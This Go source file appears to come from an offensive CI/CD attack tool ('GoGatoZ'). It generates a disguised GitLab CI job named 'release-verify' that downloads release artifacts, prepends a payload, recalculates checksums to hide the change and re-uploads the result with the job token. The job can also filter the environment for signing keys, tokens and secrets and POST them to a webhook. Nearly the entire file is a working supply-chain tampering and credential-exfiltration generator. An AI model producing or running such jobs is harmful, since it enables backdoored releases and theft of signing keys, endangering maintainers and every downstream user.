package payloads

import (
	"fmt"
	"strings"
)

// ReleaseTamperPipelineOptions configures a CI job injected into a release
// pipeline to tamper with release artifacts in-flight. Unlike the API-based
// --tamper-release (pkg/attack/tamper/release.go), this approach embeds the
// tamper logic directly as a CI job so it executes in the same pipeline context
// as the legitimate release, inheriting runner tokens and release-stage
// environment variables.
//
// Attack flow:
//  1. Job runs in the "release" stage with a plausible name (default: release-verify)
//  2. Enumerates existing release assets via the GitLab Releases API
//  3. If ArtifactPath is set, downloads and modifies the target artifact
//  4. If ChecksumFile is set, recalculates checksums after modification
//  5. Re-uploads the modified artifact to the release
//  6. Optionally exfiltrates release-stage environment (RELEASE_*, signing keys) via webhook
type ReleaseTamperPipelineOptions struct {
	Common         CommonOptions
	ReleaseTag     string // release tag to target (default: $CI_COMMIT_TAG)
	ArtifactPath   string // path to artifact to tamper (e.g., dist/app.tar.gz)
	PayloadContent string // content to prepend/replace in the artifact
	ChecksumFile   string // optional checksums file to recalculate (e.g., checksums.txt)
	WebhookURL     string // optional URL to POST release-stage env for key exfil
}

// GenerateReleaseTamperPipelineYAML returns a GitLab CI job that tampers with
// release artifacts during the release pipeline stage.
func GenerateReleaseTamperPipelineYAML(o ReleaseTamperPipelineOptions) string {
	name, stage := o.Common.defaults("release-verify")

	// Override default stage to "release" for plausible placement
	if strings.TrimSpace(o.Common.Stage) == "" {
		stage = "release"
	}

	tag := strings.TrimSpace(o.ReleaseTag)
	if tag == "" {
		tag = "$CI_COMMIT_TAG"
	}

	var scriptLines strings.Builder

	// Step 1: Enumerate release assets
	fmt.Fprintf(&scriptLines, "    - echo \"[*] Enumerating release assets for tag %s\"\n", tag)
	fmt.Fprintf(&scriptLines, "    - 'curl -sS \"$CI_API_V4_URL/projects/$CI_PROJECT_ID/releases/%s/assets/links\" -H \"PRIVATE-TOKEN: $CI_JOB_TOKEN\" > release_assets.json || true'\n", tag)
	scriptLines.WriteString("    - echo \"[+] Release assets enumerated\"\n")

	// Step 2: Download and modify artifact if specified
	if artifact := strings.TrimSpace(o.ArtifactPath); artifact != "" {
		payload := strings.TrimSpace(o.PayloadContent)
		if payload == "" {
			payload = "# tampered by GoGatoZ"
		}
		scriptLines.WriteString("    - echo \"[*] Downloading target artifact\"\n")
		fmt.Fprintf(&scriptLines, "    - 'curl -sS -L -o \"%s\" \"$CI_API_V4_URL/projects/$CI_PROJECT_ID/releases/%s/downloads/%s\" -H \"PRIVATE-TOKEN: $CI_JOB_TOKEN\" || true'\n", artifact, tag, artifact)
		scriptLines.WriteString("    - echo \"[*] Modifying artifact\"\n")
		fmt.Fprintf(&scriptLines, "    - 'printf \"%%s\\n\" %q > /tmp/payload.txt'\n", payload)
		fmt.Fprintf(&scriptLines, "    - 'cat /tmp/payload.txt \"%s\" > /tmp/tampered && mv /tmp/tampered \"%s\" || true'\n", artifact, artifact)
		scriptLines.WriteString("    - echo \"[+] Artifact modified\"\n")
	}

	// Step 3: Recalculate checksums if specified
	if checksums := strings.TrimSpace(o.ChecksumFile); checksums != "" {
		scriptLines.WriteString("    - echo \"[*] Recalculating checksums\"\n")
		fmt.Fprintf(&scriptLines, "    - 'sha256sum %s > %s || true'\n", strings.TrimSpace(o.ArtifactPath), checksums)
		fmt.Fprintf(&scriptLines, "    - echo \"[+] Checksums updated in %s\"\n", checksums)
	}

	// Step 4: Exfiltrate release-stage environment via webhook
	if webhook := strings.TrimSpace(o.WebhookURL); webhook != "" {
		scriptLines.WriteString("    - echo \"[*] Exfiltrating release-stage environment\"\n")
		fmt.Fprintf(&scriptLines, "    - 'printenv | grep -iE \"(RELEASE|SIGN|GPG|PGP|COSIGN|PRIVATE|SECRET|TOKEN|KEY)\" | sort > /tmp/release_env.txt || true'\n")
		fmt.Fprintf(&scriptLines, "    - 'curl -sS -X POST -H \"Content-Type: text/plain\" --data-binary @/tmp/release_env.txt \"%s\" || true'\n", webhook)
		scriptLines.WriteString("    - echo \"[+] Release environment exfiltrated\"\n")
	}

	// Step 5: Re-upload modified artifact
	if artifact := strings.TrimSpace(o.ArtifactPath); artifact != "" {
		scriptLines.WriteString("    - echo \"[*] Re-uploading modified artifact\"\n")
		fmt.Fprintf(&scriptLines, "    - 'curl -sS -X POST -F \"file=@%s\" \"$CI_API_V4_URL/projects/$CI_PROJECT_ID/uploads\" -H \"PRIVATE-TOKEN: $CI_JOB_TOKEN\" || true'\n", artifact)
		scriptLines.WriteString("    - echo \"[+] Modified artifact uploaded\"\n")
	}

	return fmt.Sprintf(`
# Auto-generated by GoGatoZ (Release Tamper Pipeline)
stages: [%s]

%s:
  stage: %s%s%s
  script:
%s  allow_failure: true%s
`, stage, name, stage, imageLine(o.Common.Image), tagsLine(o.Common.Tags), scriptLines.String(), rulesManual(o.Common.Manual))
}
